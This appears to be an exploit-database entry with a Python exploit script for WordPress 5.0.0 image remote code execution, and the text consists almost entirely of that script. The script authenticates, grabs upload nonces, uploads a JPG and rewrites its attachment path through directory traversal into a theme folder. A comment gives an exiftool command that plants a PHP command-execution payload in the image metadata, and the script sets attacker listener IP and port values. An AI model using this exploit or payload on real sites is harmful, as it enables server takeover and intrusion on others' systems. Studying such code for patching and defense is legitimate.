Exploits / Vulnerability Discovered : 2021-02-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress 5.0.0 image remote code execution is for educational purposes only and if it is used you will do on your own risk!
lhost = '10.10.10.10' #attacker ip
lport = '4141' #listening port
date = str(datetime.now().strftime('%Y'))+'/'+str(datetime.now().strftime('%m'))+'/'
imagename = 'gd.jpg'
# ======
# Note :
# ======
# It could be any jpg image, BUT there are some modifications first :
# 1- image name as : "gd.jpg"
# 2- place the image in the same directory as this exploit.
# 3- inject the php payload via exiftool : exiftool gd.jpg -CopyrightNotice="<?=\`\$_GET[0]\`?>"
data = {
'log':username,
'pwd':password,
'wp-submit':'Log In',
'redirect_to':url+'wp-admin/',
'testcookie':1
}
r = requests.post(url+'wp-login.php',data=data)
if r.status_code == 200:
print("[+] Login successful.\n")
else:
print("[-] Failed to login.")
exit(0)
cookies = r.cookies
print("[+] Getting Wp Nonce ... ")
res = requests.get(url+'wp-admin/media-new.php',cookies=cookies)
wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text)
if len(wp_nonce_list) == 0 :
print("[-] Failed to retrieve the _wpnonce \n")
exit(0)
else :
wp_nonce = wp_nonce_list[0]
print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce+"\n")
print("[+] Uploading the image ... ")
data = {
'name': 'gd.jpg',
'action': 'upload-attachment',
'_wpnonce': wp_nonce
}
image = {'async-upload': (imagename, open(imagename, 'rb'))}
r_upload = requests.post(url+'wp-admin/async-upload.php', data=data, files=image, cookies=cookies)
if r_upload.status_code == 200:
image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0]
_wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0]
print('[+] Image uploaded successfully ! Image ID :'+ image_id+"\n")
else :
print("[-] Failed to receive a response for uploaded image ! try again . \n")
exit(0)
print("[+] Changing the path ... ")
data = {
'_wpnonce':_wp_nonce,
'action':'editpost',
'post_ID':image_id,
'meta_input[_wp_attached_file]':date+imagename+'?/../../../../themes/'+wp_theme+'/rahali'
}
res = requests.post(url+'wp-admin/post.php',data=data, cookies=cookies)
if res.status_code == 200:
print("[+] Path has been changed successfully. \n")
else :
print("[-] Failed to change the path ! Make sure the theme is correcte .\n")
exit(0)